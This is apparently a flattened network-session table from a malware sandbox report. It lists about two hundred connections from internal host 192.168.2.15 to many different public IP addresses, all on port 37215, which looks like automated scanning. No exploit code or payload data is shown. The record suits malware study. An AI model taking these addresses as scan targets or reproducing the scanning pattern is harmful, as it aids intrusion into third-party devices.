                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9509192.168.2.153796241.175.86.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9510192.168.2.1554124107.135.211.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9511192.168.2.1542512157.72.53.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9512192.168.2.1542906157.191.181.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9513192.168.2.155017841.31.39.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9514192.168.2.1556600197.138.101.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9515192.168.2.155122427.131.3.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9516192.168.2.154463241.125.26.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9517192.168.2.1532900197.122.179.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9518192.168.2.1554660157.185.85.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9519192.168.2.1532992197.202.250.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9520192.168.2.1534656157.33.139.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9521192.168.2.1555140157.60.36.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9522192.168.2.1560048157.17.121.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9523192.168.2.1543500197.204.225.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9524192.168.2.1545996157.62.165.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9525192.168.2.1552510157.113.145.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9526192.168.2.1545932157.8.0.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9527192.168.2.1535494160.137.30.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9528192.168.2.1551140197.67.50.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9529192.168.2.154616241.138.19.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9530192.168.2.155932241.231.22.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9531192.168.2.154112441.244.4.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9532192.168.2.154697641.132.33.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9533192.168.2.1559372197.13.23.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9534192.168.2.156068241.185.121.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9535192.168.2.15481222.93.81.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9536192.168.2.1533062188.216.22.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9537192.168.2.154996041.192.45.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9538192.168.2.155162841.47.134.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9539192.168.2.1542340116.65.212.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9540192.168.2.1555976163.25.232.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9541192.168.2.1534452197.163.25.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9542192.168.2.1548846197.189.78.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9543192.168.2.154135441.177.17.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9544192.168.2.154065441.236.109.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9545192.168.2.1537592197.78.254.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9546192.168.2.1540248157.241.154.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9547192.168.2.1538092157.133.60.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9548192.168.2.1552490157.240.217.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9549192.168.2.1545540219.103.204.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9550192.168.2.155408241.7.76.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9551192.168.2.153867441.108.124.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9552192.168.2.155814447.31.113.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9553192.168.2.1539420157.38.23.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9554192.168.2.154192241.104.57.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9555192.168.2.1554136157.1.141.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9556192.168.2.1556952197.219.116.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9557192.168.2.154029085.252.125.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9558192.168.2.156086035.76.237.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9559192.168.2.155780241.47.222.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9560192.168.2.1557646197.84.141.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9561192.168.2.155636441.183.139.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9562192.168.2.1559228145.93.16.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9563192.168.2.153831841.234.98.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9564192.168.2.1559148203.242.105.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9565192.168.2.153672841.146.62.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9566192.168.2.1536092197.15.254.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9567192.168.2.153480841.244.208.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9568192.168.2.155372441.82.78.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9569192.168.2.153954841.103.6.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9570192.168.2.1539980219.248.47.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9571192.168.2.1536500157.218.46.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9572192.168.2.1559534197.192.187.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9573192.168.2.1541912157.126.171.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9574192.168.2.1557136197.5.14.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9575192.168.2.1534328157.226.202.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9576192.168.2.153971241.187.62.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9577192.168.2.1560738197.189.112.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9578192.168.2.1553412144.119.59.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9579192.168.2.1557272197.99.65.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9580192.168.2.1533618197.57.108.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9581192.168.2.1553160157.48.58.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9582192.168.2.1544446197.5.88.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9583192.168.2.155542441.129.199.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9584192.168.2.1551992157.233.18.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9585192.168.2.1546968157.245.104.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9586192.168.2.1546806197.166.133.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9587192.168.2.153411841.123.18.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9588192.168.2.155178041.209.109.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9589192.168.2.1558898197.62.137.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9590192.168.2.1550622157.40.178.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9591192.168.2.1555782184.149.107.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9592192.168.2.154258241.206.253.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9593192.168.2.1536914197.88.181.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9594192.168.2.1553354157.40.6.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9595192.168.2.1534208197.85.212.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9596192.168.2.1542976157.31.180.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9597192.168.2.153897841.19.198.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9598192.168.2.1542310157.172.217.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9599192.168.2.153590641.235.166.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9600192.168.2.1547410197.145.142.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9601192.168.2.154455291.101.216.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9602192.168.2.154694841.3.176.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9603192.168.2.1543038157.217.17.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9604192.168.2.155041092.44.242.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9605192.168.2.1557796197.171.23.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9606192.168.2.1535306197.76.156.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9607192.168.2.1550848155.21.167.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9608192.168.2.1539536197.172.57.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9609192.168.2.1538552183.143.182.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9610192.168.2.1541956139.244.165.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9611192.168.2.1543324197.198.91.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9612192.168.2.155524441.79.193.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9613192.168.2.1550172197.57.2.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9614192.168.2.155442841.32.247.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9615192.168.2.1541026197.151.70.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9616192.168.2.1550012197.59.28.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9617192.168.2.1546776197.213.237.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9618192.168.2.1554076157.132.23.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9619192.168.2.1560016210.35.84.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9620192.168.2.155501041.79.49.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9621192.168.2.1538870197.18.139.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9622192.168.2.1549776157.217.241.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9623192.168.2.153792841.27.70.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9624192.168.2.155922080.205.208.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9625192.168.2.1554770157.168.110.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9626192.168.2.155906841.200.203.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9627192.168.2.1559468157.158.140.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9628192.168.2.153981841.25.250.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9629192.168.2.1549916181.238.239.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9630192.168.2.155934841.234.110.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9631192.168.2.1557000157.10.212.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9632192.168.2.1542692137.125.77.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9633192.168.2.1560186114.170.45.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9634192.168.2.1549526157.147.17.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9635192.168.2.155188487.168.87.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9636192.168.2.155814877.23.110.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9637192.168.2.1553444197.15.130.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9638192.168.2.1538638197.50.153.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9639192.168.2.1552280157.98.62.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9640192.168.2.154252441.23.11.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9641192.168.2.1555626157.180.196.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9642192.168.2.1542460157.233.230.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9643192.168.2.1558944197.207.179.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9644192.168.2.1542016210.237.244.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9645192.168.2.1554394157.12.245.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9646192.168.2.1548686108.62.126.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9647192.168.2.153845641.205.19.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9648192.168.2.154295468.50.72.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9649192.168.2.1538040157.120.143.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9650192.168.2.1552190157.104.135.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9651192.168.2.154204042.241.248.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9652192.168.2.1552888157.70.25.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9653192.168.2.1537440165.94.120.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9654192.168.2.1536032165.153.55.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9655192.168.2.1536784141.221.170.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9656192.168.2.154993441.55.247.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9657192.168.2.154223041.137.221.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9658192.168.2.1557248197.145.252.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9659192.168.2.1551878157.100.232.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9660192.168.2.154683485.237.101.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9661192.168.2.154737641.204.60.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9662192.168.2.155652041.229.188.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9663192.168.2.155264841.103.93.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9664192.168.2.15396061.137.139.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9665192.168.2.1551036157.108.61.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9666192.168.2.1542468109.33.245.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9667192.168.2.1557894160.40.127.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9668192.168.2.1551700157.99.183.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9669192.168.2.1549096117.157.87.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9670192.168.2.1534156197.50.239.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9671192.168.2.1551916197.41.22.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9672192.168.2.1550068146.47.119.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9673192.168.2.154750441.238.135.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9674192.168.2.1544360197.212.74.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9675192.168.2.1553506157.252.150.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9676192.168.2.153735441.250.16.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9677192.168.2.1540064197.179.137.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9678192.168.2.1549112197.187.215.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9679192.168.2.1553028145.76.35.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9680192.168.2.1543672145.209.143.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9681192.168.2.153469641.147.154.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9682192.168.2.1533626197.49.37.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9683192.168.2.1553932157.159.252.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9684192.168.2.1536242197.132.213.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9685192.168.2.1548662157.37.225.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9686192.168.2.1550344197.153.153.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9687192.168.2.1549412157.89.34.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9688192.168.2.1560126197.93.137.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9689192.168.2.1538064220.139.112.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9690192.168.2.1559378157.235.155.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9691192.168.2.1544176153.128.20.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9692192.168.2.153629641.251.22.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9693192.168.2.1546342197.77.111.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9694192.168.2.1548358197.216.249.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9695192.168.2.1547390204.154.41.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9696192.168.2.153804274.143.114.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9697192.168.2.153378041.227.168.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9698192.168.2.154754641.203.94.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9699192.168.2.1560974197.229.199.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9700192.168.2.155153219.108.251.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9701192.168.2.1558068197.2.36.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9702192.168.2.154000441.66.134.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9703192.168.2.1543862163.218.110.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9704192.168.2.153766041.19.166.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9705192.168.2.153860025.57.54.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9706192.168.2.1560090197.67.203.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9707192.168.2.153577841.168.193.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9708192.168.2.1541240157.241.204.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9709192.168.2.154512841.72.255.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9710192.168.2.1539090157.131.48.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9711192.168.2.155826241.245.124.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9712192.168.2.154669041.128.115.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9713192.168.2.1550206197.208.242.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9714192.168.2.1549124187.21.179.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9715192.168.2.1556768157.250.253.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9716192.168.2.155109641.197.232.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9717192.168.2.153800041.191.191.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
